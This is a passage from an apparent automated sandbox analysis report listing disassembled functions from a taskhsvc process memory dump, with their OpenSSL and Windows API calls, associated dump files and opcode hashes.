                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 762adea00b829f6c52f69a4b08a5f79f0f29cf8ced6ae77853aa97d8c99648d2
                                                            • Instruction ID: 82dae0b7d9e5313fb9b2f21143878034208066b27111b86eab2aacbd083938ad
                                                            • Opcode Fuzzy Hash: 762adea00b829f6c52f69a4b08a5f79f0f29cf8ced6ae77853aa97d8c99648d2
                                                            • Instruction Fuzzy Hash: 27213071A189009FCB10EF3DC64165BB7F1AB85318F86995CF664CB705E235EA048BC6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE28DB0 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: lh_doalllh_freesk_pop_free
                                                            • String ID:
                                                            • API String ID: 459119117-0
                                                            • Opcode ID: a34d6b43e173da256fc37e20c5941d5b290958e1fc12db88901b18733e08fea0
                                                            • Instruction ID: 6f308bd1b7ad5c8bfdfa3440d0b305f1c7d9dd79af73bd8bb9d4612118875a02
                                                            • Opcode Fuzzy Hash: a34d6b43e173da256fc37e20c5941d5b290958e1fc12db88901b18733e08fea0
                                                            • Instruction Fuzzy Hash: CF211A76A147008FCB10DF28D684B0ABBF4FB09318F16895EE5A88B710D334E948CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF64FF0 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF65014
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF65024
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF65054
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_obj2nid$__stack_chk_faillh_retrieve
                                                            • String ID:
                                                            • API String ID: 2302522118-0
                                                            • Opcode ID: fd730b027c826fcd6187a370d4bded4d5c55f8c956cb5791f4edce5f9f4f627e
                                                            • Instruction ID: eabda02f0228bfb8cf61be10114b93e9af2baf1841d956da6900a7f4ff38567f
                                                            • Opcode Fuzzy Hash: fd730b027c826fcd6187a370d4bded4d5c55f8c956cb5791f4edce5f9f4f627e
                                                            • Instruction Fuzzy Hash: EF212C356097029BDF14DF66C280A5BB7F0BB48308F51491CEAA5ABB05C731E9048FE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3CCC0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_value$sk_num$sk_delete
                                                            • String ID:
                                                            • API String ID: 3125562421-0
                                                            • Opcode ID: edb3fab86ea713e579596805dd3f32c692df2f7f8515e036dda0f47e74107ce9
                                                            • Instruction ID: d83885f0174351a0c21af842f412363b8c754dce5d89d71b2957e94e248c9ec0
                                                            • Opcode Fuzzy Hash: edb3fab86ea713e579596805dd3f32c692df2f7f8515e036dda0f47e74107ce9
                                                            • Instruction Fuzzy Hash: E2211475509724AFC712EF24D58064EBBF0EF84354F16AA1DE8A887711D730E98ACBC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE3EE90 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CE3EED7
                                                            • EVP_MD_CTX_copy_ex.LIBEAY32 ref: 6CE3EF0A
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CE3EF22
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CE3EF3A
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Digest$Final_ex$UpdateX_copy_ex
                                                            • String ID:
                                                            • API String ID: 2597599371-0
                                                            • Opcode ID: 3cb2d61e6d10c520e76f39a300d407c7db8304a2508149a3c4107b2cce91a454
                                                            • Instruction ID: 4eef2b038e9988961ae8dfec69566e1524d1eb6a4ac66b9c2873d28239fcd7d2
                                                            • Opcode Fuzzy Hash: 3cb2d61e6d10c520e76f39a300d407c7db8304a2508149a3c4107b2cce91a454
                                                            • Instruction Fuzzy Hash: F611F6755097019FD710DF2AC98065ABBF4AF88298F219C2EE99CC3740E730E945CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF94F70 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 6CF94FA9
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE21439), ref: 6CF94FBA
                                                            • GetCurrentThreadId.KERNEL32 ref: 6CF94FC2
                                                            • GetTickCount.KERNEL32 ref: 6CF94FCA
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE21439), ref: 6CF94FD9
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                            • String ID:
                                                            • API String ID: 1445889803-0
                                                            • Opcode ID: db85835321c22fa8d02b0aeb01af5cc1d399b75e9be41292b7adf61a6a49d48a
                                                            • Instruction ID: 6dd6279e30d0c35656d7f6922c8c0128d5e6cbbe3a67d1ea483658490f7296a8
                                                            • Opcode Fuzzy Hash: db85835321c22fa8d02b0aeb01af5cc1d399b75e9be41292b7adf61a6a49d48a
                                                            • Instruction Fuzzy Hash: 5C118676A083418FDF10EFB9D88865BBBF4FB89259F410939E555C7200DB369448CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF7CCB0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 249d0b270eb90fe4f91fd1035d2c5f6c62c43a8f91b5397aabd7d9f7c07d5fe0
                                                            • Instruction ID: 3e73c6bddacf7e77236bc078d718c95307a766afbd7b3b983fbfeb97c17472ca
                                                            • Opcode Fuzzy Hash: 249d0b270eb90fe4f91fd1035d2c5f6c62c43a8f91b5397aabd7d9f7c07d5fe0
                                                            • Instruction Fuzzy Hash: 46110D31504A409FDB20EF79C64074BB7F1AB8A318F07DA1CD678DB204D230B9068FAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF54510 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • s2i_ASN1_INTEGER.LIBEAY32 ref: 6CF54535
                                                              • Part of subcall function 6CF4CFD0: BN_new.LIBEAY32 ref: 6CF4CFF4
                                                            • ERR_put_error.LIBEAY32 ref: 6CF545DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_newR_put_errors2i_
                                                            • String ID: @$A$A$}$~
                                                            • API String ID: 3657660440-1801014758
                                                            • Opcode ID: eeb50cf70d4195eb7246e60c8fa9722bf6b4cf5de55f70b145e825c83e0b9cf7
                                                            • Instruction ID: 30df74b1d81726bd93d3e87d79ebe9c191faa78def348899a3d22138e9183719
                                                            • Opcode Fuzzy Hash: eeb50cf70d4195eb7246e60c8fa9722bf6b4cf5de55f70b145e825c83e0b9cf7
                                                            • Instruction Fuzzy Hash: D1012D756093008FC700DFB9D58055BBBF4AF89348F52892DEA98C7B04E774E815CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

